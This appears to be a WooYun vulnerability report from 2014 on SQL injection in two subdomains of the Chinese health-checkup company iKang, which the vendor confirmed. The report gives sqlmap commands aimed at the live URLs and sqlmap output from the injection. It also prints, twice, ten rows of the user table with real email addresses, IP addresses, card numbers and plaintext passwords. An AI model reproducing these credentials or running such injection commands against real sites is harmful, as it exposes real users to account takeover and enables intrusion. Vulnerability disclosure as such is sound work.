当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074210

漏洞标题:爱康国宾另两处注入50万主站用户信息存泄露风险

相关厂商:爱康国宾

漏洞作者: 花花酱

提交时间:2014-08-28 15:46

修复时间:2014-10-12 15:48

公开时间:2014-10-12 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-28: 细节已通知厂商并且等待厂商处理中
2014-08-29: 厂商已经确认,细节仅向厂商公开
2014-09-08: 细节向核心白帽子及相关领域专家公开
2014-09-18: 细节向普通白帽子公开
2014-09-28: 细节向实习白帽子公开
2014-10-12: 细节向公众公开

简要描述:

你懂的,不要明文存储嘛。

详细说明:

不要明文存密码嘛~~~~
爱康有多个地方分站的子域名。有些子域名有做防注入处理,有没有没有。不知道为啥。。。。。
又发现两个存在注入的分站:

sqlmap.py -u "http://xzm.ikang.com/news_article.php?id=1" --random-agent --dbs
sqlmap.py -u "http://cdhzb.ikang.com/news_article.php?id=1" --random-agent


目测很多分站以及其他应用使用了同一个数据库。这个注入点同样可以有33个库的权限。以web库为例。应该是主站的数据库。50万注册用户的信息明文存储,包括密码。

[13:41:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
[13:41:56] [INFO] resumed: 529604
Database: web
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 529604 |
+--------+---------+
[13:41:56] [INFO] fetched data logged to text files under '/home/litdg/workspace/sqlmap/output/cqhnb.ikang.com'


测试密码可登陆主站。

web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
Database: web
Table: user
[10 entries]
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| id | cardid | corpid | memberid | ip | city | type | title | email | status | content | nickname | keywords | password |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| 1 | 7000000000000001 | 2383 | 300535 | 60.194.121.93 | <blank> | <blank> | <blank> | raymond.du@ikang.com | 1 | <blank> | Raymond | <blank> | soso |
| 2 | 0021000000157444 | 206 | NULL | 61.129.127.226 | <blank> | <blank> | <blank> | roquel@163.com | 0 | <blank> | RoqueL | <blank> | anichr |
| 3 | 1111000000012757 | 2383 | NULL | 124.203.150.151 | <blank> | <blank> | <blank> | lm_irena@sina.com | 0 | <blank> | lm_irena | <blank> | 596621 |
| 4 | NULL | NULL | NULL | 222.35.170.153 | <blank> | <blank> | <blank> | judy@ikang.com | 0 | <blank> | Judy | <blank> | anichr |
| 5 | 1111000000016090 | 2383 | NULL | 218.23.34.152 | <blank> | <blank> | <blank> | mayimin@ah163.com | 0 | <blank> | mayimin | <blank> | 550223 |
| 6 | NULL | NULL | NULL | 219.142.174.152 | <blank> | <blank> | <blank> | nuo.zha@ikang.com | 0 | <blank> | Divine | <blank> | 123456 |
| 7 | 7000000000000003 | 2383 | NULL | 61.51.225.93 | <blank> | <blank> | <blank> | motuo12345@yahoo.com.cn | 0 | <blank> | motuo12345 | <blank> | 453392123 |
| 8 | NULL | NULL | NULL | NULL | <blank> | <blank> | <blank> | yaolan01@126.com | 0 | <blank> | 412545 | <blank> | ikang1371 |
| 9 | 1111000000016999 | 2383 | NULL | 218.19.161.78 | <blank> | <blank> | <blank> | kong168@163.com | 0 | <blank> | kong168168 | <blank> | 65124104 |
| 10 | 7000000000000004 | 2383 | NULL | 222.130.86.172 | <blank> | <blank> | <blank> | yaolan01@126.com | 0 | <blank> | \\?d2\\?a6\\?bd\\?f0\\?c0\\?bc | <blank> | ikang1371 |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+


漏洞证明:

web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
Database: web
Table: user
[10 entries]
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| id | cardid | corpid | memberid | ip | city | type | title | email | status | content | nickname | keywords | password |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| 1 | 7000000000000001 | 2383 | 300535 | 60.194.121.93 | <blank> | <blank> | <blank> | raymond.du@ikang.com | 1 | <blank> | Raymond | <blank> | soso |
| 2 | 0021000000157444 | 206 | NULL | 61.129.127.226 | <blank> | <blank> | <blank> | roquel@163.com | 0 | <blank> | RoqueL | <blank> | anichr |
| 3 | 1111000000012757 | 2383 | NULL | 124.203.150.151 | <blank> | <blank> | <blank> | lm_irena@sina.com | 0 | <blank> | lm_irena | <blank> | 596621 |
| 4 | NULL | NULL | NULL | 222.35.170.153 | <blank> | <blank> | <blank> | judy@ikang.com | 0 | <blank> | Judy | <blank> | anichr |
| 5 | 1111000000016090 | 2383 | NULL | 218.23.34.152 | <blank> | <blank> | <blank> | mayimin@ah163.com | 0 | <blank> | mayimin | <blank> | 550223 |
| 6 | NULL | NULL | NULL | 219.142.174.152 | <blank> | <blank> | <blank> | nuo.zha@ikang.com | 0 | <blank> | Divine | <blank> | 123456 |
| 7 | 7000000000000003 | 2383 | NULL | 61.51.225.93 | <blank> | <blank> | <blank> | motuo12345@yahoo.com.cn | 0 | <blank> | motuo12345 | <blank> | 453392123 |
| 8 | NULL | NULL | NULL | NULL | <blank> | <blank> | <blank> | yaolan01@126.com | 0 | <blank> | 412545 | <blank> | ikang1371 |
| 9 | 1111000000016999 | 2383 | NULL | 218.19.161.78 | <blank> | <blank> | <blank> | kong168@163.com | 0 | <blank> | kong168168 | <blank> | 65124104 |
| 10 | 7000000000000004 | 2383 | NULL | 222.130.86.172 | <blank> | <blank> | <blank> | yaolan01@126.com | 0 | <blank> | \\?d2\\?a6\\?bd\\?f0\\?c0\\?bc | <blank> | ikang1371 |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+

修复方案:

版权声明:转载请注明来源 花花酱@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-29 14:44

厂商回复:

漏洞确认,我们立即修复,谢谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-08-29 18:54 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @爱康国宾 上周去你们那体检,被吓到做了全套的体检!!!http://weibo.com/1859213130/BiPajeabp?mod=weibotime ,你们要不要也考虑在乌云众测上一期项目,好让我把被坑的体检费赚回来呀?